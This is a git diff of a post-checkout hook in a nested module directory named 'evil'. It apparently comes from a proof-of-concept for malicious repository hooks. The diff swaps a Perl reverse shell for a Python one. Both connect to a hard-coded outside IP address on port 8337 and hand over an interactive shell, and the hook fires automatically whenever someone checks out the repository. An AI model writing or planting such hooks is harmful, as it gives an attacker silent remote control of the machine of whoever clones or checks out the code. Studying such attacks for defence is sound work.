diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index a35d747..197d664 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/sh -perl -e 'use Socket;$i="104.237.143.51";$p=8337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' \ No newline at end of file +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("104.237.143.51",8337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' \ No newline at end of file